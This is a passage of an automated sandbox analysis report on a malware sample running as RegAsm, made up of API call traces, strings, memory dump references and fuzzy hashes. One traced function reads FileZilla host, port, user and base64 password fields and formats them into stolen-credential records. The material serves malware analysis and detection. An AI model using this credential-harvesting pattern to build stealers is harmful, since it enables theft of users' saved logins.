                                                                                                                                                                                                                                        • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1498829745-0
                                                                                                                                                                                                                                        • Opcode ID: 2615ec560cdb2c1a10ecaa05070d148f4a90f8d52c94285c4d2187c6f722cb7f
                                                                                                                                                                                                                                        • Instruction ID: adffa3e7da8eb43a5bcae6fb888e125dec844c82986ee0a6d8cae4d8ea5a37e5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2615ec560cdb2c1a10ecaa05070d148f4a90f8d52c94285c4d2187c6f722cb7f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8131F575B04219ABCB00DB84EC46BEF7779EF85715F14407AFA08A6280D7745A048BEA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 19CC2001
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
                                                                                                                                                                                                                                        • API String ID: 0-914542581
                                                                                                                                                                                                                                        • Opcode ID: 027e6441c0a730bbf601fc709490ef51081518178ddf1428e655c3fa3ba21229
                                                                                                                                                                                                                                        • Instruction ID: 52dcb8342321c0e382b7e869141cbeceeb16fe98a90d7f542212bf147aab6999
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 027e6441c0a730bbf601fc709490ef51081518178ddf1428e655c3fa3ba21229
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5621E476900205AFDB11AF69EC40F567BAAFF04354F488419F4C897191D772F860CBA2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: RtreeMatchArg
                                                                                                                                                                                                                                        • API String ID: 0-1459067757
                                                                                                                                                                                                                                        • Opcode ID: 790208c96945a283d470a6caaa4cfb5bb78583ffd85e9808db312b7f586b5bb7
                                                                                                                                                                                                                                        • Instruction ID: ee4c942108d428cb2949acb00431a669a5284fd3e690bdc294057c45b3bb82cf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 790208c96945a283d470a6caaa4cfb5bb78583ffd85e9808db312b7f586b5bb7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A02F1759047428FC715CF24E881A1BBBF2BF89354F18852DE9C59B391E731E984CBA2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F37
                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F46
                                                                                                                                                                                                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F5D
                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F6C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4291131564-0
                                                                                                                                                                                                                                        • Opcode ID: 0cf6c307582c09c58365ce669227be7a52b012e3e5f8b937cc83d1a50c8f3791
                                                                                                                                                                                                                                        • Instruction ID: c5d6de6eb5c64771bd9390db4b19ad01a52cb4a27094bb8536fc16c2df0bce05
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0cf6c307582c09c58365ce669227be7a52b012e3e5f8b937cc83d1a50c8f3791
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF014F76340312BBE7204FA5AC55F56B7ACEF05B61F200022FB09EB2C0D7B5A8108BA4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 19CE597E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
                                                                                                                                                                                                                                        • API String ID: 0-143322027
                                                                                                                                                                                                                                        • Opcode ID: 9ac72c86f914ef627e486586083afa2657ae08d9a6661534c1086b134d96ea48
                                                                                                                                                                                                                                        • Instruction ID: 466a3dc34594a6ce0467073f00c941684345f3eba07ec2d1e1255822eb1c7910
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9ac72c86f914ef627e486586083afa2657ae08d9a6661534c1086b134d96ea48
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69117CB6600206BFDB109F58DC84F86BBADFF59324F049144F6489B291D7B6B5A4CBA0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: befe4a69bcccdb957f8933b6963a13cfc5677a4a17138ee6d0ac34dc3b134068
                                                                                                                                                                                                                                        • Instruction ID: 8295d391368377f13c3a7ad6221ddabcf1a0f805bcaa19b4f7f760eaa828ac22
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: befe4a69bcccdb957f8933b6963a13cfc5677a4a17138ee6d0ac34dc3b134068
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 01315BB5B10201AFE740DF69EC85B66B7E9FF48314F088528F999D3281E771F910CAA1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2465822312.0000000019C48000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465674236.0000000019C40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019C41000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019DA6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2465822312.0000000019E4D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E4F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466680910.0000000019E82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2466716295.0000000019E8F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_19c40000_RegAsm.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e76559eff6f24dd42f12c0e1004ca23433f9e9503ac318d2eb920aa3b4814f71
                                                                                                                                                                                                                                        • Instruction ID: 9c7d94cc24f2131212495383e86be6caa339bba534dadb3024ae17792b4b22c7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e76559eff6f24dd42f12c0e1004ca23433f9e9503ac318d2eb920aa3b4814f71
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 18316DB6600341AFEF109F25EC85B167BEDEF94354F188828F9868B291E771E950CB61
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040BF10: lstrlen.KERNEL32(75B65460,?,75B65460,00000000,?,0040C0A5,0040C8C0,?,0040C8C0,?,75B65460,00000000), ref: 0040BF5F
                                                                                                                                                                                                                                          • Part of subcall function 0040BF10: strchr.MSVCRT ref: 0040BF75
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0040C8C0,?,75B65460,00000000,?,?,?,?,?,?,?,?,004215B1,000000FF), ref: 0040C0B1
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,004215B1,000000FF,?,0040C8C0,?,?,?), ref: 0040C0B8
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004215B1,000000FF,?,0040C8C0,?,?), ref: 0040C0CD
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,004215B1,000000FF,?,0040C8C0,?,?,?), ref: 0040C0D4
                                                                                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0040C0F1
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040C102
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004215B1), ref: 0040C109
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C133
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040C13A
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0040C8C0), ref: 0040C146
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040C14D
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C162
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040C169
                                                                                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0040C18C
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C19A
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040C1A1
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C1C0
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0040C8C0), ref: 0040C1D3
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040C1DA
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C1EF
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040C1F6
                                                                                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0040C219
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C227
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040C22E
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C256
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040C25D
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0040C8C0), ref: 0040C269
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040C270
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C285
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040C28C
                                                                                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0040C2AC
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C2BD
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040C2C4
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040C2CB
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040C2DD
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040C2E4
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040C305
                                                                                                                                                                                                                                          • Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
                                                                                                                                                                                                                                          • Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1
                                                                                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0040C32B
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C342
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040C349
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040C350
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0040C35F
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040C366
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C374
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040C37B
                                                                                                                                                                                                                                          • Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9
                                                                                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0040C397
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C3A3
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040C3AA
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040C3D7
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040C3DE
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0040C8C0), ref: 0040C3EA
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040C3F1
                                                                                                                                                                                                                                        • strcpy_s.MSVCRT ref: 0040C407
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C416
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040C41D
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?), ref: 0040C491
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000), ref: 0040C4A1
                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 0040C530
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0040C537
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2461081989.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$lstrcpymallocstrchrstrncpy
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3662779188-0
                                                                                                                                                                                                                                        • Opcode ID: 94de16d627383293b9dc17cc193afd69119facb2a0f6166f012a74c18b98ba21
                                                                                                                                                                                                                                        • Instruction ID: b40cbd5fc23cbd84975b33a862b5865f3c8f674952f2fc639572ad373f1cfd8d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 94de16d627383293b9dc17cc193afd69119facb2a0f6166f012a74c18b98ba21
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFE16575900216EBCB14EBE0DC99EAF7B79FF49304F50552AFA02B3281DB385905CBA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040CB66
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CB71
                                                                                                                                                                                                                                          • Part of subcall function 00411BD0: malloc.MSVCRT ref: 00411BE1
                                                                                                                                                                                                                                          • Part of subcall function 00411BD0: strncpy.MSVCRT ref: 00411BF1
                                                                                                                                                                                                                                          • Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040CBA8
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBB3
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 0040CBF0
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CBFB
                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040CC38
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CC47
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCD3
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CCEB
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD03
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CD1B
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,Soft: FileZilla), ref: 0040CD33
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,Host: ), ref: 0040CD42
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040CD55
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00427F1C), ref: 0040CD64
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040CD77
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00427F20), ref: 0040CD86
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,Login: ), ref: 0040CD95
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040CDA8
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00427F2C), ref: 0040CDB7
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,Password: ), ref: 0040CDC6
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040CDD9
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00427F3C), ref: 0040CDE8
                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00427F40), ref: 0040CDF7
                                                                                                                                                                                                                                          • Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
                                                                                                                                                                                                                                          • Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52
                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 0040CE3B
                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CE51
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040CEA5
